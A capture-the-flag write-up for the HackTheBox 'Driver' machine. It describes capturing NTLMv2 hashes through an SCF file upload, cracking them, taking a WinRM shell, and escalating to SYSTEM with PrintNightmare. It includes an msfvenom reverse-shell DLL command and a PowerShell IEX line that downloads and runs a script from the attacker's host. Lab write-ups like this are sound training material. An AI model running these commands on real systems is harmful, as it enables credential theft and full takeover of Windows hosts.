CTF-Writeups/HackTheBox/Driver.md
2022-02-26 19:54:05 +05:00

154 lines
5.7 KiB
Markdown

# HackTheBox-Driver
## NMAP
```bash
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
```
## PORT 139/445 (SMB)
<img src="https://i.imgur.com/IBXHYKS.png"/>
Checking smb share through anonymous login it seems we don't have access it to it so let's move on to web server
## PORT 80 (HTTP)
<img src="https://i.imgur.com/0mkBrUB.png"/>
On visiting web server , it's going to ask credentials so let's try `admin;admin` to see if this works
<img src="https://i.imgur.com/NVhljZR.png"/>
And it did it ,so let's see what we have here
<img src="https://i.imgur.com/95fm27D.png"/>
It's running on php , I checked to include index file with `php` extension and this loaded the page so this page is written on php so just some basic enumeration here. There are only two pages here , the other page is about uploading a firmware for the printer
<img src="https://i.imgur.com/GnxJ2Mp.png"/>
I tried uploading something but it doesn't seem that I can access that file from anywhere so I ran `gobuster` and it also didn't found anyhing interesting
<img src="https://i.imgur.com/NuH6pdP.png"/>
Now I kept thinking but nothing was coming to my mind until I focused on these lines " upload the respective firmware update to our file share" , so maybe the file we upload here is going to smb share , so here I learned a new attack which is known as SCF File attack `Shell Command File`.
So we need to create a `.scf` file , it will look like this
<img src="https://i.imgur.com/L2NWqDM.png"/>
Now we will have to upload this file and at the same time run `responder` to catch NTMLv2 hash
```bash
responder -I tun0 -rdw -v
```
<img src="https://i.imgur.com/HkapBfq.png"/>
Just copy any of the hash , they all are the same, the only different is the time difference (in seconds) and save the hash in a file , and crack it with `hashcat`
<img src="https://i.imgur.com/W81nBqI.png"/>
<img src="https://i.imgur.com/bJX5GI2.png"/>
Now to verify if we have valid creds , we can use `crackmapexec` to verify it on smb
<img src="https://i.imgur.com/1pz9Fgr.png"/>
<img src="https://i.imgur.com/UdIj8xJ.png"/>
We only have read access here so we can't get a shell using `smbexec` or `psexec`. Since WinRM is open (port 5985) , we can check if we can get a shell with that
<img src="https://i.imgur.com/MmHkNMh.png"/>
It's showing us the status "pwned" meaning that we can get a shell
<img src="https://i.imgur.com/1SYEpTi.png"/>
## Privilege Escalation (Print Nightmare Python)
Assuming from the web page that there's a print spooler service running , we can test if we can exploit `PrintNightmare` , now this requires some setup as we need to clone the specifc impacket repo
https://github.com/cube0x0/CVE-2021-1675
After cloning it we would then have to run `python3 ./setup.py install` and copy the contents of `CVE-2021-1675.py` , start the smb server using `service smbd restart` and generate a dll reverse shell
```bash
msfvenom x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.14.125 LPORT=2222 -f dll -o /var/smb/shell.dll
```
Make sure that you have made read access to other group for this file
<img src="https://i.imgur.com/8EuX6wy.png"/>
<img src="https://i.imgur.com/LbV1F2Y.png"/>
Now to lauch the script and catch the shell
<img src="https://i.imgur.com/h7cqJzw.png"/>
<img src="https://i.imgur.com/OmUARkO.png"/>
## Print Nightmare (Powershell)
We can achieve SYSTEM on this machine through powershell as well , without the need of setting up a smb server
So we'll use this POC for the pring nightmare exploit
https://github.com/calebstewart/CVE-2021-1675
<img src="https://i.imgur.com/xf9SfW9.png"/>
After transferring it to target machine , let's import the ps1 file. But if we try to import the script , it's going to show us an error "running scripts is disabled on this system"
<img src="https://i.imgur.com/RjZRgk7.png"/>
So to bypass this , we need to download the file using `IEX`
```powershell
IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.120/nightmare.ps1');
```
<img src="https://i.imgur.com/wsaPL90.png"/>
An advantage of downloading it this way is that not only it downloads the file but it will actually import the script so we don't have to import it manually
```powershell
Invoke-Nightmare -NewUser "USER" -NewPassword "PASS"
```
<img src="https://i.imgur.com/aFTw2a1.png"/>
We can see that the user has been created
<img src="https://i.imgur.com/FGrijZM.png"/>
And we can then just switch to this user by logging in with `evil-winrm`
<img src="https://i.imgur.com/6QZffHz.png"/>
## References
- https://1337red.wordpress.com/using-a-scf-file-to-gather-hashes/
- https://www.jaacostan.com/2021/07/printnightmare-cve-2021-1675-poc.html
- https://github.com/cube0x0/CVE-2021-1675
- https://github.com/calebstewart/CVE-2021-1675
- https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70